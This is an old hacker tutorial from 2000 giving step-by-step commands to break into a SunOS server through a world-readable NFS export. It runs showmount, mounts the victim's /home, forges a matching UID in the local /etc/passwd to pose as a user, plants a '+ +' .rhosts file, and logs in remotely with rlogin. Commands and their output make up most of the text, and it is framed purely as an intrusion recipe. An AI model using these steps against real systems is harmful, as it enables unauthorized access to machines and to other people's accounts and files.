----------------------------------------------------------------------------- + + + AAAAA AAAAA AAAAA AAAAA A AAAAA A A A AAAAA AAAAA AAAAA + + A A A A A A A A A A A A A A A A + + AAAAA AAAAA A AAAAA A AAAAA A A A AAAAA A AAAAA + + A A A A A A A A A A A A A A A A + + A A AAAAA A A A AAAAA A A A A AAAAA A A A + + + ----------------------------------------------------------------------------- + Date : 20. June 2000 + + Title : How to hack easyly and simply a SunOS server? + + Author : kozo2000 + ----------------------------------------------------------------------------- How to hack easyly and simply a SunOS server? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Requirements: - a linux server, where you have root access - RPC program installed on the destination server mysite:~#/usr/sbin/showmount -e victim.site.com This command displays the export dirctiories on the destination server, and that who has access to them. If this is (everyone) then you can hack this server. But if it display 'RPC: Program not installed' then it's better to give up trying, you won't hack this server this way. So, if everything is OK, do the followings: mysite:~#/usr/sbin/showmount -e victim.site.com /usr victim.site.com /home (everyone) -> everyone can see the directory /home :) /cdrom (everyone) ...ect. mysite:~#mkdir /tmp/mount mysite:~#/bin/mount -nt nfs victim.site.com:/home /tmp/mount/ mount the directory (Note that, you can only mount with root access) mysite:~#ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ You found a user named rapper with uid 102. Now add a line to the file /etc/passwd: mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd -> You need to be root!! mysite:~#su - rapper -> Now simply log in as rapper Welcome to rapper's user. mysite:~>echo "+ +" > rapper/.rhosts -> Create a files named .rhosts, and add + + (needed for rlogin) mysite:~>cd / mysite:~>rlogin victim.site.com -> Log in with rlogin SunOs ver....(crap) victim:~$ Now you have an accont at the destination server. Now comes hacking for the root access This is not descriped here. (sorry...) But the stuff above works.